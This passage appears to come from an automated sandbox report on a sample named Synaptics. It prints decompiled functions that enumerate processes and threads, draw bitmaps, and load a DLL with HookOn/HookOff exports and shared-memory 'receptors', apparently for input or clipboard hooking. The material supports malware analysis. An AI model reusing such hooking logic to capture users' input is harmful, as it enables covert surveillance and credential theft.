						 *0x49ebf8 = GetProcAddress( *0x49ebf4, "CreateToolhelp32Snapshot");
						 *0x49ebfc = GetProcAddress( *0x49ebf4, "Heap32ListFirst");
						 *0x49ec00 = GetProcAddress( *0x49ebf4, "Heap32ListNext");
						 *0x49ec04 = GetProcAddress( *0x49ebf4, "Heap32First");
						 *0x49ec08 = GetProcAddress( *0x49ebf4, "Heap32Next");
						 *0x49ec0c = GetProcAddress( *0x49ebf4, "Toolhelp32ReadProcessMemory");
						 *0x49ec10 = GetProcAddress( *0x49ebf4, "Process32First");
						 *0x49ec14 = GetProcAddress( *0x49ebf4, "Process32Next");
						 *0x49ec18 = GetProcAddress( *0x49ebf4, "Process32FirstW");
						 *0x49ec1c = GetProcAddress( *0x49ebf4, "Process32NextW");
						 *0x49ec20 = GetProcAddress( *0x49ebf4, "Thread32First");
						 *0x49ec24 = GetProcAddress( *0x49ebf4, "Thread32Next");
						 *0x49ec28 = GetProcAddress( *0x49ebf4, "Module32First");
						 *0x49ec2c = GetProcAddress( *0x49ebf4, "Module32Next");
						 *0x49ec30 = GetProcAddress( *0x49ebf4, "Module32FirstW");
						 *0x49ec34 = GetProcAddress( *0x49ebf4, "Module32NextW");
					}
				}
				if( *0x49ebf4 == 0 ||  *0x49ebf8 == 0) {
					return 0;
				} else {
					return 1;
				}
			}



                                                                                                                                                                                                                            0x004728ad
                                                                                                                                                                                                                            0x004728bd
                                                                                                                                                                                                                            0x004728c2
                                                                                                                                                                                                                            0x004728d5
                                                                                                                                                                                                                            0x004728e7
                                                                                                                                                                                                                            0x004728f9
                                                                                                                                                                                                                            0x0047290b
                                                                                                                                                                                                                            0x0047291d
                                                                                                                                                                                                                            0x0047292f
                                                                                                                                                                                                                            0x00472941
                                                                                                                                                                                                                            0x00472953
                                                                                                                                                                                                                            0x00472965
                                                                                                                                                                                                                            0x00472977
                                                                                                                                                                                                                            0x00472989
                                                                                                                                                                                                                            0x0047299b
                                                                                                                                                                                                                            0x004729ad
                                                                                                                                                                                                                            0x004729bf
                                                                                                                                                                                                                            0x004729d1
                                                                                                                                                                                                                            0x004729e3
                                                                                                                                                                                                                            0x004729e3
                                                                                                                                                                                                                            0x004728c2
                                                                                                                                                                                                                            0x004729eb
                                                                                                                                                                                                                            0x004729f9
                                                                                                                                                                                                                            0x004729fa
                                                                                                                                                                                                                            0x004729fd
                                                                                                                                                                                                                            0x004729fd

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00472B2B,00000000,021E2354,00475AEA,00000000,00475BD5,?,00000000,021E2354,?,0049A4F9,001F0001,00000000,00000000), ref: 004728B8
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004728D0
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 004728E2
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 004728F4
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 00472906
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 00472918
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0047292A
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0047293C
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0047294E
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 00472960
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 00472972
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 00472984
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 00472996
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32First), ref: 004729A8
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 004729BA
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 004729CC
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 004729DE
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                            • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                                                                                                                            • API String ID: 667068680-597814768
                                                                                                                                                                                                                            • Opcode ID: c24cc2f4e29e7164c5864ba41ede5b50f237ada6fc0e9d221cefe5e484333100
                                                                                                                                                                                                                            • Instruction ID: 313d851134716cbfac540d50d26340a817d4ff9888428074853f25f373159611
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c24cc2f4e29e7164c5864ba41ede5b50f237ada6fc0e9d221cefe5e484333100
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FD311FB0A48250AFDB10EFBADD86F5633A4EB153007108A77B404DF296C6BDE8409B5E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00426204 Relevance: 37.7, APIs: 25, Instructions: 248windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 52%
                                                                                                                                                                                                                            			E00426204(struct HDC__* __eax, void* __ebx, int __ecx, int __edx, void* __edi, void* __esi, int _a4, int _a8, struct HDC__* _a12, int _a16, int _a20, int _a24, int _a28, struct HDC__* _a32, int _a36, int _a40) {
				int _v8;
				int _v12;
				char _v13;
				struct HDC__* _v20;
				void* _v24;
				void* _v28;
				long _v32;
				long _v36;
				intOrPtr _v40;
				intOrPtr* _t78;
				intOrPtr _t87;
				struct HDC__* _t88;
				intOrPtr _t91;
				struct HDC__* _t92;
				struct HDC__* _t135;
				int _t162;
				intOrPtr _t169;
				intOrPtr _t171;
				struct HDC__* _t173;
				int _t175;
				void* _t177;
				void* _t178;
				intOrPtr _t179;

				_t177 = _t178;
				_t179 = _t178 + 0xffffffdc;
				_v12 = __ecx;
				_v8 = __edx;
				_t173 = __eax;
				_t175 = _a16;
				_t162 = _a20;
				_v13 = 1;
				_t78 =  *0x49de34; // 0x49b0ec
				if( *_t78 != 2 || _t162 != _a40 || _t175 != _a36) {
					_v40 = 0;
					_push(0);
					L004072E0();
					_v20 = E00426060(0);
					_push(_t177);
					_push(0x426484);
					_push( *[fs:eax]);
					 *[fs:eax] = _t179;
					_push(_t175);
					_push(_t162);
					_push(_a32);
					L004072D8();
					_v24 = E00426060(_a32);
					_v28 = SelectObject(_v20, _v24);
					_push(0);
					_t87 =  *0x49e894; // 0x100805eb
					_push(_t87);
					_t88 = _a32;
					_push(_t88);
					L00407440();
					_v40 = _t88;
					_push(0);
					_push(_v40);
					_push(_a32);
					L00407440();
					if(_v40 == 0) {
						_push(0xffffffff);
						_t91 =  *0x49e894; // 0x100805eb
						_push(_t91);
						_t92 = _v20;
						_push(_t92);
						L00407440();
						_v40 = _t92;
					} else {
						_push(0xffffffff);
						_push(_v40);
						_t135 = _v20;
						_push(_t135);
						L00407440();
						_v40 = _t135;
					}
					_push(_v20);
					L00407418();
					StretchBlt(_v20, 0, 0, _t162, _t175, _a12, _a8, _a4, _t162, _t175, 0xcc0020);
					StretchBlt(_v20, 0, 0, _t162, _t175, _a32, _a28, _a24, _t162, _t175, 0x440328);
					_v32 = SetTextColor(_t173, 0);
					_v36 = SetBkColor(_t173, 0xffffff);
					StretchBlt(_t173, _v8, _v12, _a40, _a36, _a12, _a8, _a4, _t162, _t175, 0x8800c6);
					StretchBlt(_t173, _v8, _v12, _a40, _a36, _v20, 0, 0, _t162, _t175, 0x660046);
					SetTextColor(_t173, _v32);
					SetBkColor(_t173, _v36);
					if(_v28 != 0) {
						SelectObject(_v20, _v28);
					}
					DeleteObject(_v24);
					_pop(_t169);
					 *[fs:eax] = _t169;
					_push(0x42648b);
					if(_v40 != 0) {
						_push(0);
						_push(_v40);
						_push(_v20);
						L00407440();
					}
					return DeleteDC(_v20);
				} else {
					_push(1);
					_push(1);
					_push(_a32);
					L004072D8();
					_v24 = E00426060(_a32);
					_v24 = SelectObject(_a12, _v24);
					_push(_t177);
					_push(0x4262d7);
					_push( *[fs:eax]);
					 *[fs:eax] = _t179;
					MaskBlt(_t173, _v8, _v12, _a40, _a36, _a32, _a28, _a24, _v24, _a8, _a4, E00407A44(0xaa0029, 0xcc0020));
					_pop(_t171);
					 *[fs:eax] = _t171;
					_push(0x42648b);
					_v24 = SelectObject(_a12, _v24);
					return DeleteObject(_v24);
				}
			}


























                                                                                                                                                                                                                            0x00426205
                                                                                                                                                                                                                            0x00426207
                                                                                                                                                                                                                            0x0042620d
                                                                                                                                                                                                                            0x00426210
                                                                                                                                                                                                                            0x00426213
                                                                                                                                                                                                                            0x00426215
                                                                                                                                                                                                                            0x00426218
                                                                                                                                                                                                                            0x0042621b
                                                                                                                                                                                                                            0x0042621f
                                                                                                                                                                                                                            0x00426227
                                                                                                                                                                                                                            0x004262e0
                                                                                                                                                                                                                            0x004262e3
                                                                                                                                                                                                                            0x004262e5
                                                                                                                                                                                                                            0x004262ef
                                                                                                                                                                                                                            0x004262f4
                                                                                                                                                                                                                            0x004262f5
                                                                                                                                                                                                                            0x004262fa
                                                                                                                                                                                                                            0x004262fd
                                                                                                                                                                                                                            0x00426300
                                                                                                                                                                                                                            0x00426301
                                                                                                                                                                                                                            0x00426305
                                                                                                                                                                                                                            0x00426306
                                                                                                                                                                                                                            0x00426310
                                                                                                                                                                                                                            0x00426320
                                                                                                                                                                                                                            0x00426323
                                                                                                                                                                                                                            0x00426325
                                                                                                                                                                                                                            0x0042632a
                                                                                                                                                                                                                            0x0042632b
                                                                                                                                                                                                                            0x0042632e
                                                                                                                                                                                                                            0x0042632f
                                                                                                                                                                                                                            0x00426334
                                                                                                                                                                                                                            0x00426337
                                                                                                                                                                                                                            0x0042633c
                                                                                                                                                                                                                            0x00426340
                                                                                                                                                                                                                            0x00426341
                                                                                                                                                                                                                            0x0042634a
                                                                                                                                                                                                                            0x00426360
                                                                                                                                                                                                                            0x00426362
                                                                                                                                                                                                                            0x00426367
                                                                                                                                                                                                                            0x00426368
                                                                                                                                                                                                                            0x0042636b
                                                                                                                                                                                                                            0x0042636c
                                                                                                                                                                                                                            0x00426371
                                                                                                                                                                                                                            0x0042634c
                                                                                                                                                                                                                            0x0042634c
                                                                                                                                                                                                                            0x00426351
                                                                                                                                                                                                                            0x00426352
                                                                                                                                                                                                                            0x00426355
                                                                                                                                                                                                                            0x00426356
                                                                                                                                                                                                                            0x0042635b
                                                                                                                                                                                                                            0x0042635b
                                                                                                                                                                                                                            0x00426377
                                                                                                                                                                                                                            0x00426378
                                                                                                                                                                                                                            0x0042639a
                                                                                                                                                                                                                            0x004263bc
                                                                                                                                                                                                                            0x004263c9
                                                                                                                                                                                                                            0x004263d7
                                                                                                                                                                                                                            0x004263fe
                                                                                                                                                                                                                            0x00426423
                                                                                                                                                                                                                            0x0042642d
                                                                                                                                                                                                                            0x00426437
                                                                                                                                                                                                                            0x00426440
                                                                                                                                                                                                                            0x0042644a
                                                                                                                                                                                                                            0x0042644a
                                                                                                                                                                                                                            0x00426453
                                                                                                                                                                                                                            0x0042645a
                                                                                                                                                                                                                            0x0042645d
                                                                                                                                                                                                                            0x00426460
                                                                                                                                                                                                                            0x00426469
                                                                                                                                                                                                                            0x0042646b
                                                                                                                                                                                                                            0x00426470
                                                                                                                                                                                                                            0x00426474
                                                                                                                                                                                                                            0x00426475
                                                                                                                                                                                                                            0x00426475
                                                                                                                                                                                                                            0x00426483
                                                                                                                                                                                                                            0x0042623f
                                                                                                                                                                                                                            0x0042623f
                                                                                                                                                                                                                            0x00426241
                                                                                                                                                                                                                            0x00426246
                                                                                                                                                                                                                            0x00426247
                                                                                                                                                                                                                            0x00426251
                                                                                                                                                                                                                            0x00426261
                                                                                                                                                                                                                            0x00426266
                                                                                                                                                                                                                            0x00426267
                                                                                                                                                                                                                            0x0042626c
                                                                                                                                                                                                                            0x0042626f
                                                                                                                                                                                                                            0x004262ab
                                                                                                                                                                                                                            0x004262b2
                                                                                                                                                                                                                            0x004262b5
                                                                                                                                                                                                                            0x004262b8
                                                                                                                                                                                                                            0x004262ca
                                                                                                                                                                                                                            0x004262d6
                                                                                                                                                                                                                            0x004262d6

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 73C9A520.GDI32(?,00000001,00000001), ref: 00426247
                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 0042625C
                                                                                                                                                                                                                            • MaskBlt.GDI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,004262D7,?,?), ref: 004262AB
                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 004262C5
                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004262D1
                                                                                                                                                                                                                            • 73C9A590.GDI32(00000000), ref: 004262E5
                                                                                                                                                                                                                            • 73C9A520.GDI32(?,?,?,00000000,00426484,?,00000000), ref: 00426306
                                                                                                                                                                                                                            • SelectObject.GDI32(?,?), ref: 0042631B
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,100805EB,00000000,?,?,?,?,?,00000000,00426484,?,00000000), ref: 0042632F
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,?,00000000,?,100805EB,00000000,?,?,?,?,?,00000000,00426484,?,00000000), ref: 00426341
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,00000000,000000FF,?,?,00000000,?,100805EB,00000000,?,?,?,?,?,00000000,00426484), ref: 00426356
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,100805EB,000000FF,?,?,00000000,?,100805EB,00000000,?,?,?,?,?,00000000,00426484), ref: 0042636C
                                                                                                                                                                                                                            • 73C9B150.GDI32(?,?,100805EB,000000FF,?,?,00000000,?,100805EB,00000000,?,?,?,?,?,00000000), ref: 00426378
                                                                                                                                                                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 0042639A
                                                                                                                                                                                                                            • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,?,?,?,?,00440328), ref: 004263BC
                                                                                                                                                                                                                            • SetTextColor.GDI32(?,00000000), ref: 004263C4
                                                                                                                                                                                                                            • SetBkColor.GDI32(?,00FFFFFF), ref: 004263D2
                                                                                                                                                                                                                            • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 004263FE
                                                                                                                                                                                                                            • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 00426423
                                                                                                                                                                                                                            • SetTextColor.GDI32(?,?), ref: 0042642D
                                                                                                                                                                                                                            • SetBkColor.GDI32(?,?), ref: 00426437
                                                                                                                                                                                                                            • SelectObject.GDI32(?,00000000), ref: 0042644A
                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00426453
                                                                                                                                                                                                                            • 73C9B410.GDI32(?,00000000,00000000,0042648B,?,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 00426475
                                                                                                                                                                                                                            • DeleteDC.GDI32(?), ref: 0042647E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Object$B410$ColorSelectStretch$Delete$A520Text$A590B150Mask
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3348367721-0
                                                                                                                                                                                                                            • Opcode ID: 51e273fba67bde6babbdc730237f11150b88246f786cee28d1dbe93902eef5d4
                                                                                                                                                                                                                            • Instruction ID: aac08ee918962813e68096157f6589243fc941b0343c0b747259aa04d8bf8f88
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51e273fba67bde6babbdc730237f11150b88246f786cee28d1dbe93902eef5d4
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7681A6B1A44218AFDB50EE99CD81FAF7BECAB0D714F510559FA18F7281C238AD008B75
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004764E4 Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 144filelibraryloaderCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                            			E004764E4(void* __eax, void* __ebx, void __ecx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				struct HINSTANCE__* _t30;
				intOrPtr _t46;
				intOrPtr _t70;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t86;
				intOrPtr _t89;
				void _t97;
				void* _t99;
				intOrPtr _t102;

				_push(0);
				_t97 = __ecx;
				_t74 = __edx;
				_t99 = __eax;
				_push(_t102);
				_push(0x476697);
				_push( *[fs:eax]);
				 *[fs:eax] = _t102;
				if(__edx == 0) {
					if( *((intOrPtr*)(__eax + 0x48)) != 0) {
						 *((intOrPtr*)(__eax + 0x48))();
					}
					_t30 =  *(_t99 + 0x40);
					if(_t30 != 0) {
						FreeLibrary(_t30);
					}
					if( *(_t99 + 0x30) != 0) {
						UnmapViewOfFile( *(_t99 + 0x38));
						UnmapViewOfFile( *(_t99 + 0x3c));
						CloseHandle( *(_t99 + 0x30));
						CloseHandle( *(_t99 + 0x34));
					}
				} else {
					_t82 =  *0x49ec58; // 0x21e4a3c
					E0047671C(__edx, _t82, __edx, __ecx, __eax);
					_t46 =  *0x49ec5c; // 0x0
					 *(_t99 + 0x40) = LoadLibraryA(E00404E80(_t46));
					if( *(_t99 + 0x40) == 0) {
						_t86 =  *0x49ec58; // 0x21e4a3c
						E00404CCC( &_v8, _t86, 0x4766ac);
						E0047671C(_t74, _v8, _t74, _t97, _t99);
						_t70 =  *0x49ec5c; // 0x0
						 *(_t99 + 0x40) = LoadLibraryA(E00404E80(_t70));
					}
					 *((intOrPtr*)(_t99 + 0x44)) = GetProcAddress( *(_t99 + 0x40), "HookOn");
					 *((intOrPtr*)(_t99 + 0x48)) = GetProcAddress( *(_t99 + 0x40), "HookOff");
					if( *((intOrPtr*)(_t99 + 0x44)) == 0 ||  *((intOrPtr*)(_t99 + 0x48)) == 0) {
						E0040D144(0x4766c8, 1);
						E00404378();
					}
					_t75 = CreateFileMappingA(0xffffffff, 0, "true", 0, "true", "ElReceptor");
					 *(_t99 + 0x30) = _t75;
					if(_t75 == 0) {
						E0040D144(0x4766f8, 1);
						E00404378();
					}
					_t76 = MapViewOfFile( *(_t99 + 0x30), 2, 0, 0, 0);
					 *(_t99 + 0x38) = _t76;
					 *_t76 = _t97;
					_t77 = CreateFileMappingA(0xffffffff, 0, "true", 0, "true", "CBReceptor");
					 *(_t99 + 0x34) = _t77;
					if(_t77 == 0) {
						E0040D144(0x4766f8, 1);
						E00404378();
					}
					_t78 = MapViewOfFile( *(_t99 + 0x34), 2, 0, 0, 0);
					 *(_t99 + 0x3c) = _t78;
					 *_t78 = _t97;
					 *((intOrPtr*)(_t99 + 0x44))();
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E0047669E);
				return E004049C0( &_v8);
			}


















                                                                                                                                                                                                                            0x004764e7
                                                                                                                                                                                                                            0x004764ec
                                                                                                                                                                                                                            0x004764ee
                                                                                                                                                                                                                            0x004764f0
                                                                                                                                                                                                                            0x004764f4
                                                                                                                                                                                                                            0x004764f5
                                                                                                                                                                                                                            0x004764fa
                                                                                                                                                                                                                            0x004764fd
                                                                                                                                                                                                                            0x00476502
                                                                                                                                                                                                                            0x00476645
                                                                                                                                                                                                                            0x00476647
                                                                                                                                                                                                                            0x00476647
                                                                                                                                                                                                                            0x0047664a
                                                                                                                                                                                                                            0x0047664f
                                                                                                                                                                                                                            0x00476652
                                                                                                                                                                                                                            0x00476652
                                                                                                                                                                                                                            0x0047665b
                                                                                                                                                                                                                            0x00476661
                                                                                                                                                                                                                            0x0047666a
                                                                                                                                                                                                                            0x00476673
                                                                                                                                                                                                                            0x0047667c
                                                                                                                                                                                                                            0x0047667c
                                                                                                                                                                                                                            0x00476508
                                                                                                                                                                                                                            0x00476508
                                                                                                                                                                                                                            0x00476512
                                                                                                                                                                                                                            0x00476517
                                                                                                                                                                                                                            0x00476527
                                                                                                                                                                                                                            0x0047652e
                                                                                                                                                                                                                            0x00476533
                                                                                                                                                                                                                            0x0047653e
                                                                                                                                                                                                                            0x0047654a
                                                                                                                                                                                                                            0x0047654f
                                                                                                                                                                                                                            0x0047655f
                                                                                                                                                                                                                            0x0047655f
                                                                                                                                                                                                                            0x00476570
                                                                                                                                                                                                                            0x00476581
                                                                                                                                                                                                                            0x00476588
                                                                                                                                                                                                                            0x0047659c
                                                                                                                                                                                                                            0x004765a1
                                                                                                                                                                                                                            0x004765a1
                                                                                                                                                                                                                            0x004765ba
                                                                                                                                                                                                                            0x004765bc
                                                                                                                                                                                                                            0x004765c1
                                                                                                                                                                                                                            0x004765cf
                                                                                                                                                                                                                            0x004765d4
                                                                                                                                                                                                                            0x004765d4
                                                                                                                                                                                                                            0x004765ea
                                                                                                                                                                                                                            0x004765ec
                                                                                                                                                                                                                            0x004765ef
                                                                                                                                                                                                                            0x00476605
                                                                                                                                                                                                                            0x00476607
                                                                                                                                                                                                                            0x0047660c
                                                                                                                                                                                                                            0x0047661a
                                                                                                                                                                                                                            0x0047661f
                                                                                                                                                                                                                            0x0047661f
                                                                                                                                                                                                                            0x00476635
                                                                                                                                                                                                                            0x00476637
                                                                                                                                                                                                                            0x0047663a
                                                                                                                                                                                                                            0x0047663c
                                                                                                                                                                                                                            0x0047663c
                                                                                                                                                                                                                            0x00476683
                                                                                                                                                                                                                            0x00476686
                                                                                                                                                                                                                            0x00476689
                                                                                                                                                                                                                            0x00476696

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,00476697,?,?,?,?,00000000,?,0049A2F2,00000000,00000000,0049A352), ref: 00476522
                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,00000000,00476697,?,?,?,?,00000000,?,0049A2F2,00000000,00000000,0049A352), ref: 0047655A
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HookOn), ref: 0047656B
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,HookOff), ref: 0047657C
                                                                                                                                                                                                                            • CreateFileMappingA.KERNEL32 ref: 004765B5
                                                                                                                                                                                                                            • MapViewOfFile.KERNEL32(?,00000002,00000000,00000000,00000000,000000FF,00000000,?,00000000,?,ElReceptor,00000000,HookOff,00000000,00000000,00476697), ref: 004765E5
                                                                                                                                                                                                                            • CreateFileMappingA.KERNEL32 ref: 00476600
                                                                                                                                                                                                                            • MapViewOfFile.KERNEL32(?,00000002,00000000,00000000,00000000,000000FF,00000000,?,00000000,?,CBReceptor,?,00000002,00000000,00000000,00000000), ref: 00476630
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(?,00000000,00476697,?,?,?,?,00000000,?,0049A2F2,00000000,00000000,0049A352), ref: 00476652
                                                                                                                                                                                                                            • UnmapViewOfFile.KERNEL32(?,00000000,00476697,?,?,?,?,00000000,?,0049A2F2,00000000,00000000,0049A352), ref: 00476661
                                                                                                                                                                                                                            • UnmapViewOfFile.KERNEL32(?,?,00000000,00476697,?,?,?,?,00000000,?,0049A2F2,00000000,00000000,0049A352), ref: 0047666A
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,00000000,00476697,?,?,?,?,00000000,?,0049A2F2,00000000,00000000,0049A352), ref: 00476673
                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,00000000,?,?,00000000,00476697,?,?,?,?,00000000,?,0049A2F2,00000000,00000000,0049A352), ref: 0047667C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$View$Library$AddressCloseCreateHandleLoadMappingProcUnmap$Free
                                                                                                                                                                                                                            • String ID: CBReceptor$ElReceptor$HookOff$HookOn
                                                                                                                                                                                                                            • API String ID: 2408097603-676361416
                                                                                                                                                                                                                            • Opcode ID: 2b51ab161f7a6a73c944b74f510952dad87c742354b9ad4922b2cb5082a712e8
                                                                                                                                                                                                                            • Instruction ID: bf3a7df91238c31d5b8269ba8868fe670cbdf993f40fb106005159f73c36cbb0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b51ab161f7a6a73c944b74f510952dad87c742354b9ad4922b2cb5082a712e8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 534163B0700B00ABD730BBB6DD86B5677E5AB44708F91453FF649AB6D1CA79B8048B0C
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0042A510 Relevance: 28.4, APIs: 14, Strings: 2, Instructions: 351COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 65%
                                                                                                                                                                                                                            			E0042A510(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, char* _a4) {
				intOrPtr _v8;
				intOrPtr* _v12;
				void* _v16;
				struct HDC__* _v20;
				char _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v37;
				intOrPtr _v44;
				void* _v48;
				struct HDC__* _v52;
				intOrPtr _v56;
				intOrPtr* _v60;
				intOrPtr* _v64;
				short _v66;
				short _v68;
				signed short _v70;
				signed short _v72;
				void* _v76;
				intOrPtr _v172;
				char _v174;
				intOrPtr _t150;
				signed int _t160;
				intOrPtr _t163;
				void* _t166;
				void* _t174;
				void* _t183;
				signed int _t188;
				intOrPtr _t189;
				struct HDC__* _t190;
				struct HDC__* _t204;
				signed int _t208;
				signed short _t214;
				intOrPtr _t241;
				intOrPtr* _t245;
				intOrPtr _t251;
				intOrPtr _t289;
				intOrPtr _t290;
				intOrPtr _t295;
				signed int _t297;
				signed int _t317;
				void* _t319;
				void* _t320;
				signed int _t321;
				void* _t322;
				void* _t323;
				void* _t324;
				intOrPtr _t325;

				_t316 = __edi;
				_t323 = _t324;
				_t325 = _t324 + 0xffffff54;
				_t319 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v52 = 0;
				_v44 = 0;
				_v60 = 0;
				 *((intOrPtr*)( *_v12 + 0xc))(__edi, __esi, __ebx, _t322);
				_v37 = _v36 == 0xc;
				if(_v37 != 0) {
					_v36 = 0x28;
				}
				_v28 = E0040275C(_v36 + 0x40c);
				_v64 = _v28;
				_push(_t323);
				_push(0x42aa2d);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				_push(_t323);
				_push(0x42aa00);
				_push( *[fs:edx]);
				 *[fs:edx] = _t325;
				if(_v37 == 0) {
					 *((intOrPtr*)( *_v12 + 0xc))();
					_t320 = _t319 - _v36;
					_t150 =  *((intOrPtr*)(_v64 + 0x10));
					if(_t150 != 3 && _t150 != 0) {
						_v60 = E00403BBC(1);
						if(_a4 == 0) {
							E004032B4( &_v174, 0xe);
							_v174 = 0x4d42;
